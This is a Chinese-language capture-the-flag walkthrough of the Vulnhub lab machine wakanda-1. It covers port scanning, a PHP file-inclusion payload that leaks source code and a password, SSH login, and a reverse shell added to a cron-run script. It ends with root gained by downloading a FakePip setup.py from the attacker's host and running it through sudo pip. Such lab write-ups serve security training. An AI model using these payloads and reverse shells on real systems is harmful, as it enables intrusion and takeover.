Vulnhub靶場:wakanda-1


Vulnhub靶場:wakanda-1

一、環境准備

1,下載地址:https://www.vulnhub.com/entry/wakanda-1,251/

2,下載之后,使用VirtualBox虛擬機軟件導入虛擬機

3,啟動,為了方便測試,網絡選擇了橋接模式

二、滲透練習

1,收集靶機ip地址

輸入命令:netdiscover

發現靶機ip地址為,192.168.1.102

 2,收集靶機端口信息

-sS,TCP同步掃描(TCP SYN),因為不必全部打開一個TCP連接,所以這項技術通常稱為半開掃描(half-open)。這項技術最大的好處是,很少有系統能夠把這記入系統日志。不過,你需要root權限來定制SYN數據包。

-T4,指定掃描過程使用的時序(Timing),總有6個級別(0-5),級別越高,掃描速度越快,但也容易被防火牆或IDS檢測並屏蔽掉,在網絡通訊狀況良好的情況推薦使用T4

-p-,指定掃描的端口為所有端口,及1-65535

開放端口:

80端口,為http服務

111端口,為RPC服務所有端口

3333端口,探測發現運行的為ssh服務端口

48628端口,未知端口

3,開啟了80端口,就訪問尋找突破點

4,只有一個頁面,看着沒利用漏洞,使用dirb爆破目錄看是否有可利用

輸入命令:dirb http://192.168.1.102

嘗試訪問界面,都沒有返回信息

5,仔細看了下源碼, 發現注釋的一句 href="?lang=fr",將URL添加上之后,頁面語言變成了法語

lang表示可切換的網站語言(網站常常具支持多語言,例如英語、法語、中文等),fr表示法語。我們嘗試在HTTP URL中添加這個參數,切換語言為法語。

 

6,嘗試利用,可能存在文件包含漏洞,嘗試讀取源碼

payload:http://192.168.1.102/?lang=php://filter/convert.base64-encode/resource=index

得到了網站源碼

PD9waHAKJHBhc3N3b3JkID0iTmlhbWV5NEV2ZXIyMjchISEiIDsvL0kgaGF2ZSB0byByZW1lbWJlciBpdAoKaWYgKGlzc2V0KCRfR0VUWydsYW5nJ10pKQp7CmluY2x1ZGUoJF9HRVRbJ2xhbmcnXS4iLnBocCIpOwp9Cgo/PgoKCgo8IURPQ1RZUEUgaHRtbD4KPGh0bWwgbGFuZz0iZW4iPjxoZWFkPgo8bWV0YSBodHRwLWVxdWl2PSJjb250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD1VVEYtOCI+CiAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEsIHNocmluay10by1maXQ9bm8iPgogICAgPG1ldGEgbmFtZT0iZGVzY3JpcHRpb24iIGNvbnRlbnQ9IlZpYnJhbml1bSBtYXJrZXQiPgogICAgPG1ldGEgbmFtZT0iYXV0aG9yIiBjb250ZW50PSJtYW1hZG91Ij4KCiAgICA8dGl0bGU+VmlicmFuaXVtIE1hcmtldDwvdGl0bGU+CgoKICAgIDxsaW5rIGhyZWY9ImJvb3RzdHJhcC5jc3MiIHJlbD0ic3R5bGVzaGVldCI+CgogICAgCiAgICA8bGluayBocmVmPSJjb3Zlci5jc3MiIHJlbD0ic3R5bGVzaGVldCI+CiAgPC9oZWFkPgoKICA8Ym9keSBjbGFzcz0idGV4dC1jZW50ZXIiPgoKICAgIDxkaXYgY2xhc3M9ImNvdmVyLWNvbnRhaW5lciBkLWZsZXggdy0xMDAgaC0xMDAgcC0zIG14LWF1dG8gZmxleC1jb2x1bW4iPgogICAgICA8aGVhZGVyIGNsYXNzPSJtYXN0aGVhZCBtYi1hdXRvIj4KICAgICAgICA8ZGl2IGNsYXNzPSJpbm5lciI+CiAgICAgICAgICA8aDMgY2xhc3M9Im1hc3RoZWFkLWJyYW5kIj5WaWJyYW5pdW0gTWFya2V0PC9oMz4KICAgICAgICAgIDxuYXYgY2xhc3M9Im5hdiBuYXYtbWFzdGhlYWQganVzdGlmeS1jb250ZW50LWNlbnRlciI+CiAgICAgICAgICAgIDxhIGNsYXNzPSJuYXYtbGluayBhY3RpdmUiIGhyZWY9IiMiPkhvbWU8L2E+CiAgICAgICAgICAgIDwhLS0gPGEgY2xhc3M9Im5hdi1saW5rIGFjdGl2ZSIgaHJlZj0iP2xhbmc9ZnIiPkZyL2E+IC0tPgogICAgICAgICAgPC9uYXY+CiAgICAgICAgPC9kaXY+CiAgICAgIDwvaGVhZGVyPgoKICAgICAgPG1haW4gcm9sZT0ibWFpbiIgY2xhc3M9ImlubmVyIGNvdmVyIj4KICAgICAgICA8aDEgY2xhc3M9ImNvdmVyLWhlYWRpbmciPkNvbWluZyBzb29uPC9oMT4KICAgICAgICA8cCBjbGFzcz0ibGVhZCI+CiAgICAgICAgICA8P3BocAogICAgICAgICAgICBpZiAoaXNzZXQoJF9HRVRbJ2xhbmcnXSkpCiAgICAgICAgICB7CiAgICAgICAgICBlY2hvICRtZXNzYWdlOwogICAgICAgICAgfQogICAgICAgICAgZWxzZQogICAgICAgICAgewogICAgICAgICAgICA/PgoKICAgICAgICAgICAgTmV4dCBvcGVuaW5nIG9mIHRoZSBsYXJnZXN0IHZpYnJhbml1bSBtYXJrZXQuIFRoZSBwcm9kdWN0cyBjb21lIGRpcmVjdGx5IGZyb20gdGhlIHdha2FuZGEuIHN0YXkgdHVuZWQhCiAgICAgICAgICAgIDw/cGhwCiAgICAgICAgICB9Cj8+CiAgICAgICAgPC9wPgogICAgICAgIDxwIGNsYXNzPSJsZWFkIj4KICAgICAgICAgIDxhIGhyZWY9IiMiIGNsYXNzPSJidG4gYnRuLWxnIGJ0bi1zZWNvbmRhcnkiPkxlYXJuIG1vcmU8L2E+CiAgICAgICAgPC9wPgogICAgICA8L21haW4+CgogICAgICA8Zm9vdGVyIGNsYXNzPSJtYXN0Zm9vdCBtdC1hdXRvIj4KICAgICAgICA8ZGl2IGNsYXNzPSJpbm5lciI+CiAgICAgICAgICA8cD5NYWRlIGJ5PGEgaHJlZj0iIyI+QG1hbWFkb3U8L2E+PC9wPgogICAgICAgIDwvZGl2PgogICAgICA8L2Zvb3Rlcj4KICAgIDwvZGl2PgoKCgogIAoKPC9ib2R5PjwvaHRtbD4=

解碼之后為,得到一個密碼Niamey4Ever227!!!

7,因為網站沒有后台,所以嘗試ssh登錄,在網站首頁,能發現一個敏感信息 @mamadou

 

輸入命令, ssh mamadou@192.168.1.102 -p 3333

輸入得到的密碼 Niamey4Ever227!!!

 

 登錄成功,不過使用的shell是python的,而不是bash,所以就先切換shell

import pty

pty.spawn("/bin/bash")

 成功切換shell

 

 8,獲得第一個flag,就在ssh登錄之后的目錄

 9,使用find / -name 'flag*',不能搜索,提示沒權限

 10,查看敏感信息,發現另外的用戶devops

 進入用戶目錄,發現flag2.txt,但是沒有權限查看

 11,發現在/tmp下有個test文件,時間為靶機執行之后的時間創建的,應該是靶機會自動創建test文件

 在/srv目錄下發現了創建test文件的腳本

 

 12,使用vi編輯器,編輯腳本,加上反彈shell的命令

 13,本機監聽1234端口,nc -lvvp 1234,一會就接受到了反彈的shell

查看flag2

 

 14,進行提權,

輸入命令:sudo -l,發現devops賬戶下,能不需要密碼就運行的命令之后pip

尋找可以的exp,url:https://raw.githubusercontent.com/0x00-0x00/FakePip/master/setup.py 

下載下來之后,修改里面的LHOST和LPORT為自己靶機的ip和需要監聽的端口

 15,在devops用戶上,下載exp

開啟kali上apache服務,service apache2 start

 或者利用python搭建web服務, python -m SimpleHTTPServer 8888 ,888為訪問端口號

為了方便,我就用apache了

在devops用戶的shell下,運行wget http://192.168.1.103/setup.py

下載成功

 16,在本機再次監聽端口,這次監聽的為exp下設置的端口號,我設置的為2345,所以輸入 nc -lvvp 2345

 在靶機上執行,sudo /usr/bin/pip install . --upgrade --force-reinstall,可以看到反彈shell成功,用戶為root

 17,查看最終flag

輸入命令,cd root

輸入命令,cat root.txt

 完


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM